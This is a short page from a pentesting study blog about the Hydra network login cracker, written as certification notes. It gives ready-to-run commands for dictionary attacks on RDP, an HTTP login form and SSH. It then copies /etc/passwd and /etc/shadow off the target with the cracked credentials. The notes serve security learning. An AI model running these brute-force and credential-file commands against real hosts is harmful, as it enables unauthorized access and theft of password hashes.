ShifraBlog
  • Shifra Blog 😀
  • Math🔬
    • Math Articles
      • Applied Mathematics
  • Write Up📝
    • INE ePTS
      • Black Box 1
      • Black Box 2
      • Black Box 3
      • Black Box 3 - Remastered
    • Log4j Vulnerability (Log4Shell)
  • PenTesting🧪
    • eJPT
      • 🔎Reconnaissance
      • 🐱‍💻Google Dorks
      • 🌐Web Attacks
      • ⚙️System Attacks
      • 📶Network Attacks
      • 🔐Password Attacks
      • 💻Networking
      • Pentesting Approach
  • Tools 🧰
    • Nmap
    • Shodan
    • 🐱‍👤Hashcat
    • 🐲Hydra
    • 🔍Nessus
    • 🔬Metasploit
      • Meterpreter
    • 👂Netcat
  • ☁️Database / Servers
    • 👨‍💻Access Tricks
  • 🛂Physical Pentesting
    • 🔑Lost Passwords
Powered by GitBook
On this page
  • Get info about specific module:
  • Launch 📖Dictionary Attack against a service:
  • Download files from remote source (SSH):

Was this helpful?

  1. Tools 🧰

🐲Hydra

Fast, parallelized, Network Authentication cracker -> support different protocols.

Previous🐱‍👤HashcatNext🔍Nessus

Last updated 3 years ago

Was this helpful?

Hydra is based on modules, piece of code that let's Hydra attack specific protocol.

Get info about specific module:

hydra -U rdp

Launch 📖Dictionary Attack against a service:

hydra -L users.txt -P pass.txt <service://server> <options>

<service;//server>: for example-> - telne://target.server - http-get://localhost (pass protected web resource).

<options>: -V: show all attempts. -f stop when first correct creds

Attacking an HTTP Log-in form:

hydra crackeme.site http-post-form "/login.php:usr=^USER^&pwd=^PASS^:invalid credentials" -L /usr/share/ncrack/minimal.usr -P /usr/share/seclists/Passwords/rockyou-15.txt -f -V

Attacking a server with SSH:

hydra 192.168.0.12 ssh  -L /usr/share/ncrack/minimal.usr -P /usr/share/seclists/Passwords/Leaked-Databases/rockyou-10.txt -f -V

then use the username and pass you got to connect: ssh found_username@192.168.0.12

you can use telnet instead of ssh and check with: telnet 192.168.0.12 -l <found_username>

Download files from remote source (SSH):

scp <cracked_username>@<ip>:/etc/passwd .
scp <cracked_username>@<ip>:/etc/shadow .

Secure Copy Protocol (scp), used to download the files from the target machine based on SSH.

hence why we bruteforce (or obtain) SSH creds first cuz we will be asked to enter pass when we use it.